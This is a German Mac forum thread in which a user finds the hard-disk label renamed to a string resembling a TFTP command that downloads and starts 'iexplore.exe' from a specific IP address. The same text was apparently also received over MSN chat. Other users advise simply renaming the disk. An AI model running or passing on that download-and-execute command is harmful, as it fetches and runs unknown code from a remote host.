Hilfe!! HD nennt sich um!!

iKaScH

Morgenduft
Registriert
22.10.07
Beiträge
167
hi,

Meine verknüpfung von der HD auf meinem Desktop hat sich aufeinmal umbenant...
in
tftp ßi 77.65.140.153 get iexplore.exe7start iexplore.exe

genau das selbe steht auch im Finder als Festplatten bezeichnung...

Und in Adium hatte ich aufeinmal einen freund ähnliches mehrfach in einer nachricht geschickt.
was is das und was mache ich nun? Also der Befehl ist eindeutig aber woher kommt das?
also kann ich die Festplattte einfach wieder umbennen oder is das ein Virus oder was is das..?

Danke
greetz
Kasch
 

unknown7

Kaiserapfel
Registriert
28.01.07
Beiträge
1.716
Oh Mann, das Teil scheint aber ein krassen Aufmerksamkeitsdefizit zu haben... Speicher doch mal ein paar schöne Bilder drauf.

Nein, im Ernst: Ich habe leider keine Ahnung wie es dazu kommt :(
 

[GnG]Jonathan

Gast
nenn die festplatte einfach mal um. wirklich viel scheint ja nicht passiert zu sein
 

space

Neuer Berner Rosenapfel
Registriert
02.12.05
Beiträge
1.949
Benenne sie einfach wieder um!

Läuft denn wenigstens dein XP anständig? :p

Gruss
 

iKaScH

Morgenduft
Registriert
22.10.07
Beiträge
167
Benenne sie einfach wieder um!

Läuft denn wenigstens dein XP anständig? :p

Gruss

ich habe sie jetz umbennant ohne probs un mache mal einen reboot.

und ich habe alles was iwas mit MS zu tun hat vom mac runter geschmissen. dafür hab ich meinen Laptop..
 

iKaScH

Morgenduft
Registriert
22.10.07
Beiträge
167
oouk
scheint alles wieder normal zu sein..
hatte eben noch probs mit AdiumX (MSN) aber das geht nu wieder.
seltsam. dann danke an euch und sorry für so ne nullnummer. hab gedacht da könnte noch etwas dahinter stecken was noch im system hängt oder sowas...

greetz
KaScH
 

odins

Finkenwerder Herbstprinz
Registriert
19.12.05
Beiträge
470
das ihr die finger von dem scheiß Windows nich lassen könnt :)
 

iKaScH

Morgenduft
Registriert
22.10.07
Beiträge
167
mein Mac wollte den ie7 nich ich sondern der Mac...
warum auch immer..